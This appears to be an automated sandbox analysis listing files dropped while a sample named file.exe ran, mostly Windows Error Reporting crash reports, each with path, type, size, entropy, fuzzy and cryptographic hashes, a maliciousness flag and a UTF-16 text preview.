Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.7.5.8.5.2.5.7.9.8.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.5.5.c.1.8.7.-.2.4.4.c.-.4.0.8.d.-.9.d.3.b.-.9.7.e.5.d.4.c.9.b.9.4.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.f.c.7.c.a.3.f.-.3.5.8.1.-.4.f.5.8.-.8.b.5.d.-.3.8.3.d.8.8.4.2.6.8.c.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.8.-.0.0.0.1.-.0.0.1.a.-.4.1.4.8.-.d.c.1.7.8.a.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_c53b2fc9a1ffa4aae2b84b74286e467c848ba0_440dec59_06fdd724\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8847922385921617
Encrypted:	false
SSDEEP:	192:Ca1VfavNjH56rL03jDym/u7spS274It1hBx:F2x56rgjJ/u7spX4ItN
MD5:	045350D3F506D65A4AA750CD926CED5F
SHA1:	A2AFE64BB69714BD712DFD8FEE83B3B582D89A91
SHA-256:	0508015AE2B2B1CB3472C4459EF8BEC8099C719ADD1770185AB939AFDBAF136D
SHA-512:	8AE065C67A139D6DE61B98E4A0759F202FD7D0B3033F8C8DD84D9E9828693F4AB2911CB3B79458D84372C07C7341199A591D1F3B2A01C990F3A4C86EC0C3A992
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.7.3.5.4.6.1.3.2.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.2.2.f.9.f.9.f.-.d.d.8.0.-.4.c.c.4.-.a.7.7.5.-.b.9.d.b.9.2.2.9.e.8.5.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.4.2.6.c.9.f.7.-.2.0.d.5.-.4.d.5.7.-.9.2.5.a.-.6.1.9.1.4.e.4.0.9.0.5.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.8.-.0.0.0.1.-.0.0.1.a.-.4.1.4.8.-.d.c.1.7.8.a.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_c53b2fc9a1ffa4aae2b84b74286e467c848ba0_440dec59_0831a7e6\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.842266400581941
Encrypted:	false
SSDEEP:	192:O01a1VfavnjH56rL03jDB/u7spS274It1hBx:O0S2j56rgjl/u7spX4ItN
MD5:	85094D9C5EF6D2E7E289BC2608268853
SHA1:	C37EF11883705B25002E3532E9D0E40BD43A20FB
SHA-256:	99586DA1455970C5232C2380D240D02580E26BE557797265E83E479269AC6D83
SHA-512:	6EF9497ADDF4BB74696CB58809D54280364ECBC639BC2B663E5DAB6EF9521636A3C2A44A027C139AB5A6759435E3FA4D5A1EFFFC82ECF1D0A31E49FE3570ADDC
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.7.2.3.8.2.1.9.8.4.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.8.5.3.3.6.7.5.-.c.7.0.1.-.4.e.9.6.-.9.f.6.3.-.d.8.9.7.6.1.8.d.0.5.4.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.c.0.5.4.b.1.-.2.c.f.6.-.4.9.9.9.-.8.a.c.f.-.5.f.7.9.6.a.c.d.e.0.f.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.8.-.0.0.0.1.-.0.0.1.a.-.4.1.4.8.-.d.c.1.7.8.a.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_c53b2fc9a1ffa4aae2b84b74286e467c848ba0_440dec59_0ba59066\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8423223365804364
Encrypted:	false
SSDEEP:	192:oTxUESa1Vfav0jH56rL03jDB/u7spS274It1hBx:sD2a56rgjl/u7spX4ItN
MD5:	D40F054883F5574001B5F974FD4E22D7
SHA1:	17E872F0A393855EE3737405B8BDE67F3216D190
SHA-256:	D3C2CCE0F9C9A3E565C7104FD74566A5AF2A0FCBF55E2DD3158CEC0F5DDD9AC3
SHA-512:	64C57F2BB69467DB2AAEEE9A2750B5963AA544A87304418677B2C900517AFD37DD4E65E506365C8EC47F435AE543A59FAFADDBD8231FE8A84B13FADD046EC8D8
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.7.1.7.7.4.0.9.2.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.5.5.6.2.f.8.2.-.4.d.e.7.-.4.d.3.7.-.b.c.2.2.-.b.e.1.5.d.d.1.f.5.9.5.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.9.b.5.4.7.1.-.6.1.a.a.-.4.b.5.5.-.a.f.2.1.-.8.d.9.1.9.b.8.4.a.a.e.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.8.-.0.0.0.1.-.0.0.1.a.-.4.1.4.8.-.d.c.1.7.8.a.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_c53b2fc9a1ffa4aae2b84b74286e467c848ba0_440dec59_10519f99\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8422240262457396
Encrypted:	false
SSDEEP:	192:ZTa1VfavSjH56rL03jDB/u7spS274It1hBx:62Q56rgjl/u7spX4ItN
MD5:	B99DFC1DCEBB789F1DD111A73611D636
SHA1:	906F132099103DC458CC3188A90BB5C063EEA226
SHA-256:	D360715792237D1095C680060AAD37BC256C4FEAC2ABFA67A5BAA462515B0A0B
SHA-512:	F7726E5B68F40FD47FFBFFA8123E5C5BF1BB3012189100BCE904868587AF861178DB14E4EE922638FC1EA545566A187F38EE9DE59E04E712E3162037D86EE4F4
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.7.2.1.5.6.6.6.3.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.4.6.c.1.e.d.c.-.7.7.0.4.-.4.f.7.7.-.b.9.5.6.-.3.4.b.7.4.0.2.8.d.4.5.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.d.b.9.c.4.f.e.-.7.5.2.c.-.4.7.0.e.-.8.a.2.0.-.3.f.5.1.4.c.3.6.7.0.2.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.8.-.0.0.0.1.-.0.0.1.a.-.4.1.4.8.-.d.c.1.7.8.a.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_c53b2fc9a1ffa4aae2b84b74286e467c848ba0_440dec59_1209c12b\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8649227754744622
Encrypted:	false
SSDEEP:	192:La1VfavajH56rL03jDm/u7spS274It1hBx:Y2o56rgjC/u7spX4ItN
MD5:	F4775207330948AFDAA9160AD9EEDBD4
SHA1:	83E7F6C06030221B1CE48A4717EA0B30096A39A0
SHA-256:	EF8345D6601548A4BFE6B60B4F25FB1AD88D90AD6A8B99EEA68C539D3E1FD6CA
SHA-512:	59CB71B5C2A4C308D688FED678BFAF3FC46E1A914E97C290E3C874CAD090991BB3A67CBF6AA77CEE1459CDA415706384F322212F1ED8BBC89AD4866D8A4A0863
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.7.2.8.3.3.0.5.1.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.5.1.a.a.a.9.8.-.4.4.0.e.-.4.b.d.a.-.a.a.3.8.-.b.b.4.1.8.3.2.e.d.b.9.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.a.f.4.3.6.c.-.2.5.5.8.-.4.1.2.f.-.a.9.b.c.-.6.c.0.2.5.2.3.5.c.f.7.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.8.-.0.0.0.1.-.0.0.1.a.-.4.1.4.8.-.d.c.1.7.8.a.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_c53b2fc9a1ffa4aae2b84b74286e467c848ba0_440dec59_121597e8\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8419855119820575
Encrypted:	false
SSDEEP:	192:la1VfavNjH56rL03jDB/u7spS274It1hBx:C2x56rgjl/u7spX4ItN
MD5:	7AF3F4160BC3546410E7DC180A7ECF06
SHA1:	A8E1021D9671D1F5659B12B3070C2B9F4B5EDD21
SHA-256:	8E3D5679AE0FF52EAEBF5503EFAB5D908540ECB1F0B85B442627F4BD58F2CE30
SHA-512:	1473363C59EC492E38F62DF1D98D5D56C3F0FC5447E0BF840BD2360B98BFF3C995AB540F68C180E1F2C5A3B67E3F8A98093809762B2D59439D5B8064DB338BAA
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.7.1.9.6.6.0.7.9.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.0.c.5.4.4.c.a.-.8.6.5.5.-.4.6.7.7.-.8.d.f.4.-.4.5.e.7.6.b.4.a.d.e.0.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.9.4.e.0.4.2.4.-.4.d.1.c.-.4.f.a.9.-.a.7.1.1.-.0.3.8.a.d.4.d.a.5.5.9.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.8.-.0.0.0.1.-.0.0.1.a.-.4.1.4.8.-.d.c.1.7.8.a.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_c53b2fc9a1ffa4aae2b84b74286e467c848ba0_440dec59_1745ca23\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.865131622299613
Encrypted:	false
SSDEEP:	192:J2Ua1Vfav5jH56rL03jDm/u7spS274It1hBx:J2H2956rgjC/u7spX4ItN
MD5:	AA18E6B88F975382D4C2861CC5E75DC4
SHA1:	DABD45C838268B1602C22056BAB93703F0DB8C62
SHA-256:	BC747973575F366D8EF8E4D50B3DE344898C495042633621EB3002BC79F10A55
SHA-512:	273E6418F99AB09E6EF9060A8489DA66A399C88987F16086A570C17E43313B04BF0D05449D5F23A2F88CB096FB1465A57C8F5F469978B66F2B4CE35A4B5541E2
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.7.3.2.1.6.8.3.5.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.2.a.6.b.5.7.2.-.e.d.9.c.-.4.d.3.5.-.9.6.4.6.-.3.0.c.2.9.d.e.c.e.4.3.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.6.1.6.b.d.7.-.8.1.6.1.-.4.1.1.d.-.b.b.8.a.-.4.2.9.d.3.5.6.a.2.1.8.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.8.-.0.0.0.1.-.0.0.1.a.-.4.1.4.8.-.d.c.1.7.8.a.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_c53b2fc9a1ffa4aae2b84b74286e467c848ba0_440dec59_17858673\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8285394352078531
Encrypted:	false
SSDEEP:	192:ya1VfavZjH56rL03jDk/u7spS274It1hBx:12d56rgjg/u7spX4ItN
MD5:	2A81DD4A38A9BDCD1200AF8DEA157BD4
SHA1:	3F01398449B2CDAE288AD4AEF8505510F1A83139
SHA-256:	6734F0FBA66160E412948559AA719791BE95445EBD931321509C4384F826C7EF
SHA-512:	50A0A10FA442742D4C55FF120C646BC7210105CEA58C3637BC51A775BF31E71E2176C6151EF296A34A330B8772A5940F14C0ABCF21A4A257ED31DD6C1EBB58FA
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.7.1.5.1.9.7.8.2.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.4.3.3.c.b.7.f.-.a.b.6.d.-.4.9.d.7.-.b.4.8.c.-.6.e.a.6.9.d.d.1.d.0.3.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.3.6.7.e.8.4.-.0.1.6.f.-.4.b.e.9.-.a.9.7.0.-.7.1.9.8.0.9.6.2.3.f.1.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.8.-.0.0.0.1.-.0.0.1.a.-.4.1.4.8.-.d.c.1.7.8.a.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_e5c8e0fd69b3d1364c1ea6934df3966ffe947bd_440dec59_140eaddc\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9678260315854657
Encrypted:	false
SSDEEP:	192:Xa1Vfav7KHox3uC03jDyrD/u7sOS274It1hBx:k2mox3uVjg/u7sOX4ItN
MD5:	68AF24C5DEAF1453F7D607BB4DD0279E
SHA1:	AB8B5EA018F441C6C3D62C08D8C0240F7EAF00BE
SHA-256:	5AE13107077086F735700BB6498A578CDA9BC7CC1A9B47E6B34FADF36A3DC5B7
SHA-512:	721F0658EA885A800E911DCD6D16E113690460FB8278065E5F249B31B15A0F897E3D63CAF84D17989FB02B3C68B56EDA2B10ED000E3906C5B82C5E94FE7DCD24
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.7.9.0.3.9.0.9.7.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.7.4.4.8.e.9.7.-.0.c.a.2.-.4.7.d.b.-.9.a.b.9.-.9.a.2.9.3.8.0.6.8.d.4.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.b.e.e.e.b.e.4.-.f.7.0.8.-.4.b.0.5.-.8.1.f.0.-.9.6.f.f.3.f.9.0.5.c.d.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.8.-.0.0.0.1.-.0.0.1.a.-.4.1.4.8.-.d.c.1.7.8.a.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2CC5.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 4 00:42:39 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	117220
Entropy (8bit):	2.171685774044434
Encrypted:	false
SSDEEP:	768:FI/PBkhVEYvm8d3wO/3CZAwIeHO9/gAPTrRAldt8TUqN4gbgD:2Yvtd3L/3CZAwI8iPTlAbt8TUqegU
MD5:	53D096E53810CDC2FD82D8C2FC4EB6F4
SHA1:	F1664160856545D236482A046293E9009BDEA1D4
SHA-256:	25402E81B2D4CCF591836D6D8A427B87DDEC1B5798A64B1925397676B8EB14D9
SHA-512:	8C962FF68E2289E2A1550DA8D1BC244695F8862AFE9AC8A639BC2F2CDCE2FAF80271A73FE3C1D815DB2AAE42D61B552D5743BB3AC368F888370F45D1A4F0C20A
Malicious:	false
Preview:	MDMP....... .........;c............D...............L...........rI..........T.......8...........T............2..............$................................................................................U...........B..............GenuineIntelW...........T...........O.;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2FB4.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8406
Entropy (8bit):	3.6967902447323535
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiWCS6g4HL6YqCSU8qagmf6VSjCpBp89bnRFtsfNiFBm:RrlsNiw6z6YfSU8qagmfkSPnRFmfN28
MD5:	6F70E68FE71386EF665B24AC6826A60D
SHA1:	0C9DA63AED4CD90E2DE6548B1303480C7F2B258C
SHA-256:	204BB6E0515B58E2D2BEDEB3AA628F46748FB7259235E6EA45E7A601DBA9D8DF
SHA-512:	1512DCD3FEAE520FBB090939B40B93F63B38F93C7827200D5D19101958E3A914F7FF9E950561B087FA89BEF558DA429FB179FC37D345F541C3C49B3165BD63C0
Malicious:	false
